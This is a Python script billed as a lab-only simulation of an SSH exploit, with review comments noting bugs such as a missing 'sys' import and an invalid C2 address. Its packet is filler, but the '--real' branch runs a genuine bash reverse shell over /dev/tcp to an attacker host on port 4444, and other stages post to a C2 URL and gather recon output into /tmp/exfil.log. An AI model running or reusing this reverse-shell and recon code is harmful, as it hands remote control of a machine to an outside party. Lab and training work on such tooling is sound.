"""Lab-only "fake SSH exploit" simulation.

Flow (all driven by ``send_exploit``): open a TCP connection to
``target_ip``:22, send a hard-coded SSH version banner and one fixed
16-byte payload, then call ``trigger_reverse_shell`` and
``simulate_post_exploitation`` regardless of whether the connection
succeeded.  Everything below is side effects (sockets, ``os.system``,
file writes); nothing returns a value.

NOTE(review): ``sys`` is referenced in ``trigger_reverse_shell`` but never
imported, so that function raises ``NameError`` in both modes as written.
"""
import socket
import time
import os
import requests  # third-party; only used for the simulated callback

# === Lab Setup ===
target_ip = "127.0.0.1"  # change this to your VM or leave as loopback
attacker_ip = "192.168.1.1"  # change if needed
attacker_port = 4444
# NOTE(review): "22.22.333.333" is not a valid IPv4 address (octets > 255),
# so the simulated callback below can never resolve; the failure is caught
# and only printed.
c2_url = "http://22.22.333.333:8080/report"  #change to your c2 ip


# === Fake SSH Exploit ===
def build_ssh_version():
    """Return the fixed SSH identification banner sent first (CRLF-terminated)."""
    return b'SSH-2.0-ErlangTest_0.1\r\n'


def build_crafted_packet():
    """Return the fixed 20-byte payload sent after the banner.

    Looks like a 4-byte big-endian length (16) followed by 16 filler bytes
    of 0x41 -- presumably not a valid SSH packet; confirm against the lab
    target's expectations.
    """
    return b"\x00\x00\x00\x10" + b"\x41" * 16


def trigger_reverse_shell():
    """Either spawn a real shell (``--real``) or post a canned report to ``c2_url``.

    NOTE(review): ``sys`` is not imported anywhere in this file, so the
    ``sys.argv`` check raises ``NameError`` before either branch runs.
    The ``--real`` branch is destructive on the host it runs on: it hands
    an interactive bash to ``attacker_ip``:``attacker_port`` via
    ``os.system``; keep this file confined to an isolated lab VM.
    """
    if '--real' in sys.argv:
        print(f"[+] Launching real reverse shell to {attacker_ip}:{attacker_port}")
        os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'")
    else:
        try:
            print(f"[+] Sending simulated reverse shell report to C2 at {c2_url}")
            # No timeout is passed, so a reachable-but-silent host would block here.
            requests.post(c2_url, data="💥 Simulated reverse shell triggered to attacker machine!")
        except Exception as e:
            # Broad catch: any network/DNS error is reported and swallowed.
            print(f"[!] Callback failed: {e}")


def simulate_post_exploitation():
    """Run three recon commands via the shell and append output to /tmp/exfil.log.

    The path is fixed and world-visible, the file is opened in append mode
    and never truncated or removed, so repeated runs accumulate.  The
    "credentials" written at the end are literal dummy strings, not data
    read from the host.
    """
    print("[+] Simulating post-exploitation behavior...")
    # Command 1: whoami
    os.system("whoami >> /tmp/exfil.log")
    # Command 2: system info
    os.system("uname -a >> /tmp/exfil.log")
    # Command 3: show directory structure
    os.system("ls -alh /home/ >> /tmp/exfil.log")
    # Dummy credentials
    with open("/tmp/exfil.log", "a") as f:
        f.write("\n[+] Simulated exfil of dummy credentials...\n")
        f.write("username: admin\npassword: hunter2\n")
    print("[+] Post-exploitation simulation written to /tmp/exfil.log")


def send_exploit():
    """Send the banner and payload to ``target_ip``:22, then run the simulated stages.

    NOTE(review): the socket is only closed on the success path; an
    exception between ``connect`` and ``close`` leaks the descriptor
    (no ``finally``/``with``).  The stages after the ``try`` run even if
    the connection or send failed, because the broad ``except`` only
    prints the error.
    """
    print(f"[+] Connecting to target {target_ip}:22...")
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((target_ip, 22))
        sock.sendall(build_ssh_version())
        print(f"[+] Sent SSH version string")  # f-string has no placeholders
        time.sleep(0.5)
        sock.sendall(build_crafted_packet())
        print(f"[+] Sent crafted SSH pre-auth packet")  # f-string has no placeholders
        time.sleep(0.5)
        sock.close()
    except Exception as e:
        print(f"[!] Could not connect/send to target: {e}")
    # Simulated shell + post-exploitation
    # (assumed to belong inside send_exploit -- the source was collapsed to
    # one line; confirm indentation against the original file)
    trigger_reverse_shell()
    time.sleep(1)
    simulate_post_exploitation()


if __name__ == "__main__":
    send_exploit()